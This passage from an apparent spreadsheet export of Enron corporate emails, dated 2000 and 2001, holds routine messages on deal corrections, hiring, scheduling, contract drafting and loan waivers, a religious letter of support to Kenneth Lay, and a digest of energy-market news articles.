You may not feel righteous right now but you are. When you gave Jesus your life, you became righteous. So you will be delivered-it may not look like it now but this is not the end of the story. He has a plan. I know that you can't see HOW this could work together for good for you but it will. Great is His faithfulness! All afflictions-it says. ALL! _x000D_
-----Original Message----- _x000D_
From: Kenneth.Lay@enron.com _x000D_
To: Lynda.L.Phinney@williams.com _x000D_
Sent: 11/9/01 3:27 PM _x000D_
Subject: RE: Precious man of God. _x000D_
Lynda: _x000D_
I really appreciate your e-mail.  I have relied heavily on my faith, The _x000D_
Bible and prayer to get through the last few weeks.  Without God's help, _x000D_
I _x000D_
would have surely crumbled.  May He continue to bless you. _x000D_
Ken _x000D_
    -----Original Message----- _x000D_
   From:   "Phinney, Lynda L" &lt;Lynda.L.Phinney@Williams.com&gt;@ENRON _x000D_
   Sent:   Thursday, November 08, 2001 11:34 AM _x000D_
   To:     Lay, Kenneth _x000D_
   Subject:  Precious man of God. _x000D_
   Mr. Lay, _x000D_
   I am a former employee of Enron and have been through many trials in _x000D_
the _x000D_
   past few years. God has been faithful and seen me through them all. _x000D_
Dear _x000D_
   sir, I can tell you that I can count it all joy. I just want to _x000D_
   encourage you. These look like very dark times right now. Call upon _x000D_
the _x000D_
   name of the Lord. Throw yourself on the mercy and grace of the Lord _x000D_
and _x000D_
   remember all that he has done. He is a BIG, GOOD God that LOVES you! _x000D_
His _x000D_
   arm hasn't been shortened that He cannot help you. _x000D_
   You will be glad to know that the true testimony of you as a man is _x000D_
of a _x000D_
   good report. You will glorify God in this. I am listening to a song _x000D_
   right this minute that I so wish you could hear. It would bring you _x000D_
such _x000D_
   comfort. It is based on the verse that talks about "all of my help _x000D_
   cometh from the Lord". How true that is for you. _x000D_
     Lord Jesus, you are a good God that sees all things. Mr. Lay is a _x000D_
man _x000D_
     of God. That means he is your child. You tell us that you are an _x000D_
ever _x000D_
     present help in time of trouble. These troubles are over his head _x000D_
but _x000D_
     under your feet. Lord Jesus, show yourself strong on his behalf. _x000D_
     Glorify yourself and Mr. Lay will give you the glory. He knows, _x000D_
Lord. _x000D_
     Help him in this time when the waters are flowing over his head. _x000D_
Hear _x000D_
     him from where you are. We are all but dust. Who are we that you _x000D_
are _x000D_
     mindful of us but you tell us in your Word that You have good _x000D_
thoughts _x000D_
     and plans for us and they are for good and NOT EVIL that we may _x000D_
have _x000D_
     an expected end. (Jer 29:11-For I know the thoughts that I think _x000D_
     toward you, saith the LORD, thoughts of peace, and not of evil, to _x000D_
     give you an expected end.) Who can stand except you give us grace? _x000D_
     Lord, you are so good. Remind Mr. Lay of who you really are. In the _x000D_
     mighty name of Jesus! _x000D_
   Mr. Lay, get some scripture to hang onto-write it down on a card and _x000D_
   carry it with you. When things come against you (the enemy), you will _x000D_
   need to remember who you are in Jesus! The greatest battle on earth _x000D_
was _x000D_
   fought with the Word of God (Satan against Jesus in the wilderness)! _x000D_
   Isaiah 54:17-No weapon that is formed against thee shall prosper; and _x000D_
   every tongue that shall rise against thee in judgment thou shalt _x000D_
   condemn. This is the heritage of the servants of the LORD, and their _x000D_
   righteousness is of me, saith the LORD. _x000D_
   Oh Mr. Lay, one more thing. I am telling you that I haven't a clue as _x000D_
to _x000D_
   what has or has not been done. I just want to show you something from _x000D_
   the Word of God how God is. If you will read Isaiah's calling in _x000D_
Isaiah _x000D_
   6 and read Moses' calling in Exodus 3, you will see that God DOES NOT _x000D_
   mention their sin to them. Isaiah was just overcome with the glory of _x000D_
   God and confessed all by himself and Moses (remember he had killed an _x000D_
   Egyptian) was just trying to convince God that He had to be wrong. _x000D_
The _x000D_
   ONLY reason I mention it is because sometimes we delay in going to _x000D_
God _x000D_
   because we think we have done something wrong. God tells us that He _x000D_
   hasn't dealt with us according to our sins. KNOW that NO MATTER WHAT, _x000D_
   Jesus is ready to fight on your behalf! It is ALWAYS about God's _x000D_
SPIRIT _x000D_
   and not our strength. _x000D_
   When I started this email, you were just a stranger. You are now my _x000D_
   beloved brother in Christ. Isn't it amazing how God works. He has _x000D_
knit _x000D_
   my heart to yours. I will be on my knees for you. Phillipians tells _x000D_
us _x000D_
   to pray for E-V-E-R-Y-T-H-I-N-G! What does everything mean? _x000D_
EVERYTHING! _x000D_
   God's gonna do some amazing stuff so get ready!!!! His ways aren't _x000D_
our _x000D_
   ways and remember too-He is able to do EXCEEDINGLY ABOVE what we can _x000D_
ask _x000D_
   or think! _x000D_
   Lynda Phinney _x000D_
   The Joy of the Lord is my strength... _x000D_
   713-215-3520 _x000D_
   lynda.l.phinney@williams.com _x000D_
********************************************************************** _x000D_
This e-mail is the property of Enron Corp. and/or its relevant affiliate _x000D_
and may contain confidential and privileged material for the sole use of _x000D_
the intended recipient (s). Any review, use, distribution or disclosure _x000D_
by others is strictly prohibited. If you are not the intended recipient _x000D_
(or authorized to receive for the recipient), please contact the sender _x000D_
or reply to Enron Corp. at enron.messaging.administration@enron.com and _x000D_
delete all copies of the message. This e-mail (and any attachments _x000D_
hereto) are not intended to be an offer (or an acceptance) and do not _x000D_
create or evidence a binding and enforceable contract between Enron _x000D_
Corp. (or any of its affiliates) and the intended recipient or any other _x000D_
party, and may not be relied on by anyone as the basis of a contract by _x000D_
estoppel or otherwise. Thank you. _x000D_
********************************************************************** </t>
  </si>
  <si>
    <t>Fri, 17 Nov 2000 09:22:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'katrina.johnson@enron.com'})</t>
  </si>
  <si>
    <t>Re: DSM 5261</t>
  </si>
  <si>
    <t xml:space="preserve">I'm taking over Carla Hoffman's position at the Deal Control desk in _x000D_
Portland, and I've got a request from Kim Ward to look into this deal entered _x000D_
incorrectly by our Short Term Southwest desk. Unfortunately, I need more _x000D_
information, such as the deal number and term, in order to make any changes _x000D_
to it._x000D_
_x000D_
If you have this or know who does, please let me know and I'll be happy to _x000D_
make any necessary changes to this deal. My number in Portland is _x000D_
503.464.7486._x000D_
_x000D_
Thanks,_x000D_
Kate_x000D_
---------------------- Forwarded by Kate Symes/PDX/ECT on 11/17/2000 05:02 PM _x000D_
---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Kim Ward                           11/15/2000 10:31 AM_x000D_
	_x000D_
_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Re: DSM 5261_x000D_
_x000D_
Kate,  _x000D_
_x000D_
A request (below) has been made to fix a deal that was entered by Tom and _x000D_
Mark incorrectly (through the option exercise function in deal blotter).  The _x000D_
deal numbers and legs that need to be fixed are listed below.  Instead of _x000D_
being a forward transaction, these legs should be entered as index forwards.  _x000D_
We are paying the DJ PV index plus $5 or 5%, whichever is more.  Therefore, _x000D_
if daily prices were more than $100 at palo verde, the offset should be 1.05._x000D_
_x000D_
I know that i have totally confused you but let me know of any questions you _x000D_
might have and I will be glad to help._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kim_x000D_
---------------------- Forwarded by Kim Ward/HOU/ECT on 11/15/2000 09:31 AM _x000D_
---------------------------_x000D_
   _x000D_
	Enron Capital &amp; Trade Resources Corp._x000D_
	_x000D_
	From:  Katrina_Johnson@enron.com                           11/14/2000 02:03 PM_x000D_
	_x000D_
_x000D_
To: Kim.ward@enron.com_x000D_
cc:  _x000D_
Subject: Re: DSM 5261_x000D_
_x000D_
_x000D_
_x000D_
Kim,_x000D_
_x000D_
The message listed below was previously forwarded to Caroline.  Per_x000D_
Caroline, I would need to talk to the actual Trader.  Please let me know if_x000D_
you can help me resolve this issue._x000D_
Please call me at ext.  3-6488 if you have any questions._x000D_
_x000D_
Thanks,_x000D_
Katrina_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Katrina Johnson_x000D_
11/14/2000 03:02 PM_x000D_
_x000D_
To:   Caroline Emmert/HOU/ECT@ECT_x000D_
cc:_x000D_
Subject:  DSM 5261_x000D_
_x000D_
Caroline,_x000D_
_x000D_
Deal #420886 legs 3-7 have no price attached to the deal.  Would you please_x000D_
add the DJPV index plus an offset of 5%.  On legs 2 &amp; 8 the offset needs to_x000D_
be changed from $5.00 to 5%._x000D_
_x000D_
Please let me know if you have any questions._x000D_
_x000D_
Thank You,_x000D_
Katrina_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 26 Sep 2000 09:32:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lyoho@enron.com'})</t>
  </si>
  <si>
    <t>Re: job applicant</t>
  </si>
  <si>
    <t xml:space="preserve">yes_x000D_
_x000D_
_x000D_
_x000D_
	lyoho@enron.com_x000D_
	09/26/2000 09:03 AM_x000D_
		 _x000D_
		 To: Steven.J.Kean@enron.com_x000D_
		 cc: _x000D_
		 Subject: Re: job applicant_x000D_
_x000D_
_x000D_
_x000D_
Steve --_x000D_
_x000D_
Yes, I am interested in talking to him.    Should I contact Eric?_x000D_
_x000D_
Thanks for passing this along._x000D_
_x000D_
Lisa_x000D_
_x000D_
_x000D_
_x000D_
From: Steven J Kean@ENRON on 09/24/2000 05:37 PM_x000D_
_x000D_
Sent by:  Steven J Kean@ENRON_x000D_
_x000D_
_x000D_
To:   Lisa Yoho/HOU/EES@EES_x000D_
cc:_x000D_
Subject:  job applicant_x000D_
_x000D_
any interest?_x000D_
----- Forwarded by Steven J Kean/NA/Enron on 09/24/2000 05:37 PM -----_x000D_
_x000D_
                    Eric Thode_x000D_
                                        To:_x000D_
                    09/20/2000          cc:_x000D_
                    11:46 AM            Subject:_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Is this of interest to you?_x000D_
_x000D_
Eric_x000D_
_x000D_
---------------------- Forwarded by Eric Thode/Corp/Enron on 09/20/2000_x000D_
11:46 AM ---------------------------_x000D_
_x000D_
_x000D_
 (Embedded_x000D_
 image moved_x000D_
 to file:      From:  Yvette Parker_x000D_
 pic11478.pcx) 09/18/2000 05:14 PM_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
To:   Eric Thode/Corp/Enron@ENRON_x000D_
cc:_x000D_
_x000D_
Subject:  job applicant_x000D_
_x000D_
Imad Tareen forwarded me his resume for a possible job opportunity in our_x000D_
group.  (Please see below.)  I have never met him before, and I have no_x000D_
idea how he got my phone number, but his resume looks quite good.  What do_x000D_
you think?_x000D_
_x000D_
Yvette_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Yvette Parker/Corp/Enron on 09/18/2000_x000D_
05:06 PM ---------------------------_x000D_
_x000D_
_x000D_
Imad Tareen_x000D_
09/18/2000 04:39 PM_x000D_
_x000D_
To:   Yvette Parker/Corp/Enron@ENRON_x000D_
cc:_x000D_
_x000D_
Subject:  Rotation_x000D_
_x000D_
Hi  Yvette_x000D_
_x000D_
Thanks for your help.  I  am very interested in exploring opportunities in_x000D_
your group.  I have a Masters in Public Policy from Harvard which deals a_x000D_
lot with communications and running  campaigns._x000D_
_x000D_
Imad_x000D_
_x000D_
(See attached file: resumeimad[2].doc)_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 - pic11478.pcx_x000D_
 - resumeimad[2].doc_x000D_
</t>
  </si>
  <si>
    <t>Mon, 12 Mar 2001 10:55:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Start Date: 3/12/01; HourAhead hour: 19;  HourAhead schedule download failed. _x000D_
Manual intervention required.</t>
  </si>
  <si>
    <t>Mon, 24 Jul 2000 11:42:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'rob.wilson@enron.com'})</t>
  </si>
  <si>
    <t>Re: Doctoral studies</t>
  </si>
  <si>
    <t xml:space="preserve">My message was sent before I finished it._x000D_
I think it would be interesting to focus your attention on this interplay  _x000D_
--  what policy changes have meant to companies (ie the winners and losers) _x000D_
and how explicit companies are about how government policy drives their _x000D_
business strategy in these industries.  I also think it would be fascinating _x000D_
to compare regulators' visions for the industry they are restructuring with _x000D_
the reality after the fact.  I believe you would find some similarities but _x000D_
also some substantial and interesting differences._x000D_
Good luck with your studies._x000D_
My best regards to Mike; I learned a great deal working for him._x000D_
_x000D_
_x000D_
_x000D_
Rob Wilson@ENRON_x000D_
07/24/2000 04:44 PM_x000D_
_x000D_
_x000D_
To: Steven J Kean/HOU/EES@EES_x000D_
cc: Mike McGowan/ET&amp;S/Enron@ENRON _x000D_
Subject: Doctoral studies_x000D_
_x000D_
Steve,_x000D_
Vince Kaminski suggested I contact you, I'm the Gov't Affairs rep for NNG in _x000D_
Omaha and begin a doctoral studies program this fall at NU. I plan a research _x000D_
emphasis in regulatory politics, specific to energy and telecom market _x000D_
convergence and the public interest. I'd welcome any advice or suggestions _x000D_
you have regarding other potential area's of research, based on your _x000D_
professional experience in the public policy arena._x000D_
_x000D_
I appreciate any guidance, I'm in the earliest stages of forming my advisory _x000D_
committee and curriculum of study. My supervisor, Mike McGowan, sends his _x000D_
regards. _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 1 Aug 2000 11:08:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'john.lavorato@enron.com', 'mark.frevert@enron.com'})</t>
  </si>
  <si>
    <t>Status Report - ENA NI/Issues - Manager/Director Level</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by David W Delainey/HOU/ECT on 08/01/2000 _x000D_
06:08 PM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Sheila Knudsen @ ENRON                           08/01/2000 05:33 PM_x000D_
	_x000D_
_x000D_
To: David W Delainey/HOU/ECT@ECT, David Oxley/HOU/ECT@ECT_x000D_
cc: Cindy Skinner/HOU/ECT@ECT, Sheila Walton/HOU/ECT@ECT, Kim _x000D_
Melodick/HOU/ECT@ECT, Fran L Mayes/HOU/ECT@ECT _x000D_
Subject: Status Report - ENA NI/Issues - Manager/Director Level_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	_x000D_
_x000D_
Attached is a report reflecting the status of ENA Manager/Director level _x000D_
employees who were rated either Needs Improvement or Issues at the mid-year _x000D_
process._x000D_
_x000D_
We will update this report on a weekly basis.  _x000D_
_x000D_
Let me know if you have any questions regarding this - X36628._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 21 Nov 2001 08:14:09 -0800 (PST)</t>
  </si>
  <si>
    <t>Rawhide</t>
  </si>
  <si>
    <t>Evidently, waiver was received but prohibits us from selling assets or prepaying debt without their approval. I will try to get a copy of the waiver. chase waiting to issue press release stating ene has received the amendment and that we have closed and funded our nng deal. _x000D_
--------------------------_x000D_
Sent from my BlackBerry Wireless Handheld (www.BlackBerry.net)</t>
  </si>
  <si>
    <t>Fri, 1 Dec 2000 08:03:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Robin:_x000D_
I misread your message the first time.  The dates that I gave you are the _x000D_
dates that are NOT good for me so any other date will work.  Can you and _x000D_
Carolyn pick a date that works for both Julia and Kristina and just let me _x000D_
know what you come up with?  Thanks._x000D_
Carol _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Robin Jordan@ENRON COMMUNICATIONS_x000D_
	11/30/00 04:48 PM_x000D_
		_x000D_
		 To: Carol St Clair/HOU/ECT@ECT@ENRON_x000D_
		 cc: _x000D_
		 Subject: Re: Lunch with Julia and Kristina_x000D_
_x000D_
Carol,_x000D_
_x000D_
 At the moment she's available 12/7, 12/8 or 12/19.   Let me know this can _x000D_
change at any minute.   Hope you and all your "BOYS" are doing fine.  _x000D_
_x000D_
_x000D_
Robin Jordan_x000D_
Office of the General Counsel_x000D_
Enron Broadband Services_x000D_
(713) 853-3246_x000D_
(713) 646-8537 Fax_x000D_
robin_jordan@enron.net_x000D_
_x000D_
_x000D_
_x000D_
	Carol St Clair@ECT_x000D_
	11/30/00 03:57 PM_x000D_
		 _x000D_
		 To: Carolyn George/Corp/Enron@ENRON, Robin Jordan/Enron Communications@Enron _x000D_
Communications_x000D_
		 cc: _x000D_
		 Subject: Lunch with Julia and Kristina_x000D_
_x000D_
_x000D_
	_x000D_
_x000D_
_x000D_
Carolyn and Robin:_x000D_
I would like to take Julia and Kristina out to lunch for Christmas.  Could _x000D_
you please let me know which date would work best for both of them?  The _x000D_
following dates are not good for me:_x000D_
_x000D_
12/5, 12/6, 12/7, 12/8, 12/19, _x000D_
_x000D_
Thanks._x000D_
_x000D_
Carol_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 11 Dec 2000 04:56:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'rebecca.walker@enron.com', 'ben.jacoby@enron.com'})</t>
  </si>
  <si>
    <t>Three (3) letter agreements</t>
  </si>
  <si>
    <t xml:space="preserve">Team,_x000D_
_x000D_
I do not know if we have a full and complete set of documents, and if so, how _x000D_
long it will take to get these documents copied.  Ben, can you address that _x000D_
issue?  I don't want to assume that this is a slam dunk, as this is the kind _x000D_
of thing you can trip up on, especially since they are on a tight _x000D_
construction schedule._x000D_
_x000D_
I'm not sure I understand his second comment._x000D_
_x000D_
Kay_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 12/11/2000 12:53 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
"George Kutzschbach" &lt;gkutzschbach@fulbright.com&gt; on 12/11/2000 12:15:15 PM_x000D_
To: Ben.F.Jacoby@enron.com, Kay.Mann@enron.com, CCampbell@KSLAW.com, _x000D_
JKeffer@KSLAW.com_x000D_
cc: areynaud@coral-energy.com, dwhaley@coral-energy.com, _x000D_
TSeigler@coral-energy.com _x000D_
_x000D_
Subject: Three (3) letter agreements_x000D_
_x000D_
I have not received all TEH's comments, however, in the interest of time_x000D_
I am passing along the following changes to all three (3) of the letter_x000D_
agreements:_x000D_
_x000D_
Section 3(g):  The addition of "in ENA's possession" should be deleted_x000D_
from Section 3(g).  We were told that Exhibit T (or Exhibit B-2 in the_x000D_
case of the ABB) was deleted from the Facility Agreement because the_x000D_
documents had already been furnished to ENA.  If all these documents_x000D_
have been furnished by GE (or ABB), then the addition of "in ENA's_x000D_
possession" is not needed.  If all of these documents have not been_x000D_
furnished by GE (or ABB), then the Facility Agreement should specify the_x000D_
documents not yet furnished and bind GE to furnish those not yet_x000D_
furnished, and in the letter agreement ENA should covenant to deliver_x000D_
the specified documents which have been furnished._x000D_
_x000D_
Section 6(b):  Clause (iv) of Section 6(b) should be revised as_x000D_
follows:_x000D_
_x000D_
"(iv) following the date from the execution of the Facility Agreement_x000D_
through the closing of the Transaction, neither ENA nor the LLC_x000D_
will not have agreed to or issued agree to or issue any written election_x000D_
or waiver with respect to the Facility Agreement as of the date of_x000D_
closing."_x000D_
_x000D_
The draft of the Facililty Agreement contemplates that the date of the_x000D_
Facility Agreement and the date of execution are the same._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 19 Mar 2001 03:34:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Telephone call to Steve Hellman, Oil Space</t>
  </si>
  <si>
    <t>Hi Philippe -_x000D_
_x000D_
Ken asked me to request that you call the above referenced gentleman.  He was _x000D_
referred by a friend of Ken's.  He wants to see if his oil on-line business _x000D_
is a fit for us.  Ken said he has no idea whether it will work or not, but _x000D_
please give him a courtesy call._x000D_
_x000D_
Steve Hellman at 212-628-7191 or cell phone 917-623-9730._x000D_
_x000D_
Thanks._x000D_
_x000D_
Rosie</t>
  </si>
  <si>
    <t>Tue, 12 Dec 2000 00:22:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'vance.meyer@enron.com', 'katrin.haux@enron.com', 'jeannie.mandelker@enron.com', 'eric.thode@enron.com', 'richard.shapiro@enron.com', 'peggy.mahoney@enron.com', 'damon.harvey@enron.com', 'steven.kean@enron.com', 'katy.lomax@enron.com', 'keith.miceli@enron.com', 'sharonda.stephens@enron.com', 'meredith.philipp@enron.com', 'laura.schwartz@enron.com', 'gia.maisashvili@enron.com', 'mary.clark@enron.com', 'johan.zaayman@enron.com', 'elizabeth.linnell@enron.com', 'john.ambler@enron.com', 'james.steffes@enron.com', 'mark.palmer@enron.com', 'john.neslage@enron.com', 'iona.maclean@enron.com'})</t>
  </si>
  <si>
    <t>Markets Utility Stocks May Stall Amid Tech Rebound _x000D_
Los Angeles Times, 12/12/00_x000D_
INDIA: Enron India unit local lenders to cut rates._x000D_
Reuters English News Service, 12/12/00_x000D_
_x000D_
Three Firms to Sell Natural Gas Instead of Selling Products That Use It_x000D_
KRTBN Knight-Ridder Tribune Business News: The Dallas Morning News - Texas, _x000D_
12/12/00_x000D_
_x000D_
Activate ''Year-In-Review'' Factsheet_x000D_
Business Wire, 12/12/00_x000D_
_x000D_
Enron Sheds No Light on Consumer_x000D_
The Times of India, 12/12/00_x000D_
_x000D_
Enron deal can be nullified: Retd SC judge_x000D_
The Times of India, 12/12/00_x000D_
_x000D_
Green Mountain Applies To Be 10th Texas Elec Supplier_x000D_
Dow Jones Energy Service, 12/11/00_x000D_
_x000D_
The New Power Company Certified As A Retail Natural Gas Marketer In Georgia_x000D_
PR Newswire, 12/11/00_x000D_
_x000D_
USA: Big names dominate in Internet energy trading race._x000D_
Reuters English News Service, 12/11/00_x000D_
_x000D_
Dynegy's New E-Commerce Site Had $1.5 Bln in November Trading_x000D_
Bloomberg, 12/11/00_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Business; Financial Desk _x000D_
Markets Utility Stocks May Stall Amid Tech Rebound _x000D_
THOMAS S. MULLIGAN _x000D_
? _x000D_
12/12/2000 _x000D_
Los Angeles Times _x000D_
Home Edition _x000D_
Page C-4 _x000D_
Copyright 2000 / The Times Mirror Company _x000D_
NEW YORK -- Electric utility stocks, driven by strong power demand, falling _x000D_
bond yields and defensive-minded investors, have had a remarkable year so _x000D_
far. _x000D_
The Dow Jones utility stock index is up 36% year to date, while most U.S. _x000D_
blue-chip indexes are in the red. _x000D_
But in recent weeks many utility stocks have flattened. California's current _x000D_
power crisis notwithstanding, analysts note that we are headed into the part _x000D_
of the year when electricity demand slackens. _x000D_
Is the utility sector played out for now? Is it time to take profits and move _x000D_
on? _x000D_
Experts who follow electric utilities say much depends on the rest of the _x000D_
stock market. It's no accident that major utility indexes hit bottom in the _x000D_
second week of March, just as the tech-dominated Nasdaq composite index was _x000D_
soaring to its all-time high. _x000D_
Now, if tech stocks continue to recover from their spring and summer _x000D_
collapse, that could divert money from utility shares, analysts say. When a _x000D_
traditionally exciting sector like tech is red-hot, nobody wants to hear _x000D_
about utility stocks, said Doris Kelley-Watkins, portfolio manager of the _x000D_
Evergreen Utility Fund. _x000D_
Many investors who initially piled into utility issues in winter and spring _x000D_
were seeking a safe haven as Nasdaq plunged: With their high-dividend yields, _x000D_
big utility companies have long been favorite defensive plays. _x000D_
But then came the summer peak power-use season, and the country woke up to _x000D_
the reality of an electricity shortage. Utility stocks zoomed. The terrific _x000D_
gains "were a real boon to investors who came here thinking they were going _x000D_
to be bored," Kelley-Watkins said. _x000D_
Indeed, stocks of firms such as Dynegy (ticker symbol: DYN), Calpine (CPN), _x000D_
Reliant Energy (REI) and Duke Energy (DUK) are up more than 70% so far this _x000D_
year. _x000D_
Kelley-Watkins, like a number of Wall Street analysts, believes that the _x000D_
"easy money" in utility stocks already has been made. Nevertheless, there _x000D_
will still be opportunities in the sector as long as generating capacity _x000D_
stays tight--which it is sure to do for at least two or three more years, she _x000D_
said. _x000D_
Some new power plants will be coming online toward the end of 2002, _x000D_
Kelley-Watkins added, but the current supply squeeze has been more than a _x000D_
decade in the making and will not be quickly solved. _x000D_
Hence, some of the biggest gainers this year are utilities that have _x000D_
extensive energy-trading operations--Duke and Reliant, for example. They _x000D_
could continue to take advantage of soaring demand and unusual volatility, _x000D_
Kelley-Watkins said. _x000D_
Dynegy and Houston-based Enron (ENE), the nation's biggest wholesale power _x000D_
marketer as well as a major trader of natural gas and other commodities, are _x000D_
among the Evergreen fund's biggest holdings. _x000D_
Kelley-Watkins also thinks that Sempra Energy (SRE), parent of San Diego Gas _x000D_
&amp; Electric, has made a good transition from a heavily regulated owner of _x000D_
power plants to an energy distributor and transmitter. But she shies away _x000D_
from Sempra's giant California cousins, PG&amp;E (PCG) and Edison International _x000D_
(EIX, parent of Southern California Edison), which she considers too _x000D_
debt-burdened. _x000D_
Nobody welcomes a recession, but Timothy M. Winter, analyst at A.G. Edwards _x000D_
in St. Louis, said an economic downturn probably would help utility stocks, _x000D_
as many remain relatively cheap in terms of price-to-earnings ratios, and _x000D_
would continue to be viewed as a defensive haven. _x000D_
The presidential election outcome also matters, Winter said. Most Wall _x000D_
Streeters think a George W. Bush victory would be a plus for the sector _x000D_
because he probably would be more open than Al Gore to new power plant _x000D_
construction. _x000D_
Winter likes Progress Energy (PGN), formerly Carolina Power &amp; Light, because _x000D_
of its dominance in the fast-growing Southeast. His firm also recommends _x000D_
American Electric Power (AEP) and Xcel Energy (XEL). _x000D_
Michael S. Worms, analyst at Gerard Klauer Mattison in New York, said _x000D_
although electric-utility earnings should continue strong into next year, it _x000D_
will be hard to duplicate this year's 20% average profit gains. "We had a _x000D_
phenomenal year because of tight capacity and high prices," Worms said. _x000D_
Utility stocks probably would have done well on such business fundamentals, _x000D_
but they also received a strong tail wind from the stumbling tech sector, _x000D_
said Worms. _x000D_
If tech shares have bottomed, and if the Federal Reserve speeds the market's _x000D_
recovery with interest-rate cuts, that will hurt the performance of utility _x000D_
stocks, Worms said. _x000D_
His top pick is Calpine, even though shares of the San Jose-based energy _x000D_
generator and marketer already have had an amazing two-year run, up 200% so _x000D_
far this year, on top of a 400% surge in 1999. _x000D_
(BEGIN TEXT OF INFOBOX / INFOGRAPHIC) _x000D_
Running Low on Power? _x000D_
Utility stocks surged in spring and summer, but the group has stalled _x000D_
in recent weeks. _x000D_
Dow Jones index of 15 major utility stocks, weekly closes and latest _x000D_
Monday: 386.41 _x000D_
Source: Bloomberg News _x000D_
_x000D_
GRAPHIC-CHART: Running Low on Power?, Los Angeles Times; _x000D_
Copyright , 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
_x000D_
INDIA: Enron India unit local lenders to cut rates._x000D_
_x000D_
12/12/2000_x000D_
Reuters English News Service_x000D_
(C) Reuters Limited 2000._x000D_
_x000D_
BOMBAY, Dec 12 (Reuters) - The Indian unit of U.S. energy giant Enron said on _x000D_
Tuesday that four local lenders have agreed to cut their rates on loans to _x000D_
its project which is under fire from critics for producing costly power. _x000D_
ICICI , Canara Bank, State Bank of India and Industrial Finance Corporation _x000D_
of India have all agreed to cut rates by 450 basis points to 16.5 percent, a _x000D_
spokesman of Dabhol Power Company told Reuters._x000D_
Dabhol Power Company is 65 percent owned by Enron and is implementing a _x000D_
two-phase 2,184 MW power project in Maharashtra. Phase one of the project is _x000D_
already in operation. _x000D_
The cuts will help in lowering the tariff at which Enron sells power to the _x000D_
Maharashtra government, he said. _x000D_
The spokesman said the firm is considering a reduction in tariff but did not _x000D_
reveal details. _x000D_
Last week, Industrial Development Bank of India agreed to drop rates by a _x000D_
similar margin. _x000D_
The spokesman did not specify when the cuts by the financial institutions _x000D_
would come into effect. _x000D_
The state government wants the project to be reviewed but is yet to take a _x000D_
final view. _x000D_
Enron says the high tariff would come down next year when it switches over to _x000D_
the cheaper fuel of natural gas from naphtha. _x000D_
The project cost of $1.9 billion is financed 70 percent through debt. _x000D_
Enron's project is among the few foreign power projects to have begun _x000D_
operations since India opened up its power sector in 1992._x000D_
_x000D_
Copyright , 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. _x000D_
_x000D_
Three Firms to Sell Natural Gas Instead of Selling Products That Use It_x000D_
Terry Maxon_x000D_
_x000D_
12/12/2000_x000D_
KRTBN Knight-Ridder Tribune Business News: The Dallas Morning News - Texas_x000D_
Copyright (C) 2000 KRTBN Knight Ridder Tribune Business News; Source: World _x000D_
Reporter (TM)_x000D_
_x000D_
Here's how expensive natural gas has become: Three companies decided Monday _x000D_
they could make more money from selling their natural gas than from selling _x000D_
products using natural gas. _x000D_
Natural gas prices hit yet another all-time high Monday, closing at $9.413 _x000D_
per million British thermal units on the New York Mercantile Exchange. That _x000D_
represented an 83-cent increase from Friday's close, up 9.6 percent._x000D_
Two fertilizer manufacturers, Terra Industries Inc. and Mississippi Chemical _x000D_
Corp., said they were selling natural gas that normally would go to make _x000D_
nitrogen, ammonia or other products. _x000D_
And oil company Seneca Resources Corp. said gas normally used to boost heavy _x000D_
oil production in a California field would be sold instead. _x000D_
Jeff Shorter, vice president of TXU Energy Trading in Dallas, said he's not _x000D_
surprised to hear companies are selling their natural gas rather than using _x000D_
the gas to make their products. _x000D_
"I don't think that's the last of them either," Mr. Shorter said. _x000D_
He said he expects other companies to come to the same decision as Terra. _x000D_
There are a number of companies that have fully hedged their natural gas _x000D_
purchases at lower prices, and can make a profit that "far exceeds" what they _x000D_
can earn from selling their core business products, he said. _x000D_
He noted that the prices in spot markets Monday were even higher than in _x000D_
NYMEX trading. Gas for Midwest delivery ranged from $11 to $13 and $14, and _x000D_
New York gas was at $12 and higher. _x000D_
"Typically, in the winter time we have a great deal of volatility which you _x000D_
don't see in the futures market," Mr. Shorter said. _x000D_
Spot prices have been much higher in the West, where restricted natural gas _x000D_
supplies, shut-down generators and low levels of water for hydroelectric _x000D_
plants have contributed to skyrocketing electricity prices. _x000D_
Terra, based in Sioux City, Iowa, said it closed one of two ammonia plants in _x000D_
Verdigris, Okla., and its Blytheville, Ark., plant this month, so it could _x000D_
sell the natural gas used by those plants. It is profiting about $2 to $3 per _x000D_
MBtu on the gas it is reselling. _x000D_
"The natural gas price increase since our December requirements were _x000D_
purchased for Verdigris permitted us to sell a portion of those purchases and _x000D_
